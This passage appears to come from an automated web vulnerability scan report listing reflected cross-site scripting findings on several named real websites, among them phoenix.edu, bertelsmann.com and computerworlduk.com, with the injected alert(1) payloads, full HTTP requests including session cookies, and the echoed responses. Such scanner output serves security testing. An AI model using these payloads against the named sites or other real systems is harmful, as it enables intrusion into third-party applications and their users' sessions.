GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95937af"%3balert(1)//10c054b4a93&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95937af";alert(1)//10c054b4a93&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&desti ...[SNIP]...
The value of the unit request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4b9"%3balert(1)//0a352431f30 was submitted in the unit parameter. This input was echoed as be4b9";alert(1)//0a352431f30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dirbe4b9"%3balert(1)//0a352431f30&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... &postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dirbe4b9";alert(1)//0a352431f30&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no& ...[SNIP]...
The value of the user1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0112"%3balert(1)//a96fd83d2c4 was submitted in the user1 parameter. This input was echoed as f0112";alert(1)//a96fd83d2c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112"%3balert(1)//a96fd83d2c4&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... redit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112";alert(1)//a96fd83d2c4&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
setAllowDestURLOnSubmit(true);
/* an_arr's params * 0 - poid * 1 - redirect href * 2 - has p ...[SNIP]...
The value of the user2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6d2a"%3balert(1)//193f4f335e was submitted in the user2 parameter. This input was echoed as b6d2a";alert(1)//193f4f335e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a"%3balert(1)//193f4f335e&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... litary=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a";alert(1)//193f4f335e&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
The value of the user3 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6707"%3balert(1)//1e6342d0321 was submitted in the user3 parameter. This input was echoed as f6707";alert(1)//1e6342d0321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1f6707"%3balert(1)//1e6342d0321&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1f6707";alert(1)//1e6342d0321&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d898f"%3balert(1)//925ecac98bf was submitted in the version parameter. This input was echoed as d898f";alert(1)//925ecac98bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90d898f"%3balert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90d898f";alert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
The value of the level_education request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137ab"%3balert(1)//63ddfe10507a70ca9 was submitted in the level_education parameter. This input was echoed as 137ab";alert(1)//63ddfe10507a70ca9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the program_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824bc"%3balert(1)//faa69d1e4cac8c868 was submitted in the program_type parameter. This input was echoed as 824bc";alert(1)//faa69d1e4cac8c868 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the program_type2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5d8f"%3balert(1)//b75aa6850b1597960 was submitted in the program_type2 parameter. This input was echoed as c5d8f";alert(1)//b75aa6850b1597960 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the registered_nurse request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e90f"%3balert(1)//35db81cf6d89d4995 was submitted in the registered_nurse parameter. This input was echoed as 2e90f";alert(1)//35db81cf6d89d4995 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the state request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b8d"%3balert(1)//b06b0eb551423d5a9 was submitted in the state parameter. This input was echoed as d2b8d";alert(1)//b06b0eb551423d5a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c18"><script>alert(1)</script>5e11220fedb was submitted in the language parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bertelsmann_corp/wms41/bm/index.php?language=260c18"><script>alert(1)</script>5e11220fedb HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Bertelsmann - me ...[SNIP]... <a href="/bertelsmann_corp/wms41/bm/index.php?language=160c18"><script>alert(1)</script>5e11220fedb" class="meta_lang"> ...[SNIP]...
5.210. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bertelsmann.com
Path: /bertelsmann_corp/wms41/bm/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50700"><script>alert(1)</script>e85a0f4245a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bertelsmann_corp/wms41/bm/index.php?language=2&50700"><script>alert(1)</script>e85a0f4245a=1 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Bertelsmann - me ...[SNIP]... <a href="/bertelsmann_corp/wms41/bm/index.php?language=1&50700"><script>alert(1)</script>e85a0f4245a=1" class="meta_lang"> ...[SNIP]...
5.211. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcc66'-alert(1)-'3bff25cde7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php?stub=all&bcc66'-alert(1)-'3bff25cde7f=1 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php?language=2 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6b6'-alert(1)-'495846e9164 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security1f6b6'-alert(1)-'495846e9164/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e0f'-alert(1)-'d59c4c6d91f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability42e0f'-alert(1)-'d59c4c6d91f/?olo=rss HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.214. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac01a'-alert(1)-'1b0ab91431a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss&ac01a'-alert(1)-'1b0ab91431a=1 HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the olo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6016'-alert(1)-'c1d90134a6 was submitted in the olo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rssc6016'-alert(1)-'c1d90134a6 HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee62f'%3balert(1)//6bcc834eb was submitted in the from parameter. This input was echoed as ee62f';alert(1)//6bcc834eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /store?from=freemancoee62f'%3balert(1)//6bcc834eb HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <hea ...[SNIP]... t> function forgotPassword(){ var username = $("#loginName").val(); window.location.href="user/forgetPassword.jsp?username="+username; }
$(document).ready(function() { var from = 'freemancoee62f';alert(1)//6bcc834eb'; if(from == 'freemanco'){ window.location.href="/freemanco"; } }); </script> ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb27d'%3balert(1)//6c9edc3f802 was submitted in the from parameter. This input was echoed as fb27d';alert(1)//6c9edc3f802 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/?from=freemancofb27d'%3balert(1)//6c9edc3f802 HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <hea ...[SNIP]... t> function forgotPassword(){ var username = $("#loginName").val(); window.location.href="user/forgetPassword.jsp?username="+username; }
$(document).ready(function() { var from = 'freemancofb27d';alert(1)//6c9edc3f802'; if(from == 'freemanco'){ window.location.href="/freemanco"; } }); </script> ...[SNIP]...
The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 466b0<script>alert(1)</script>06150d728a4 was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload fdc1c<script>alert(1)</script>2d43224a51b was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI. ...[SNIP]... ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 ViewState: /wEWBgK6xaDLAQLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD1azw9Rle9Oba8vY3Hs81Cmd5T+41mxr5Ld0eSlB88xQfdc1c<script>alert(1)</script>2d43224a51b ---> ...[SNIP]...
5.220. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.fusionvm.com
Path: /FusionVM/DesktopDefault.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffd1"-alert(1)-"dabd45c1f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FusionVM/DesktopDefault.aspx?3ffd1"-alert(1)-"dabd45c1f1a=1 HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: http://www.criticalwatch.com/vulnerability-management.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
The value of the Alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73dfb"-alert(1)-"905ea5234ca was submitted in the Alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
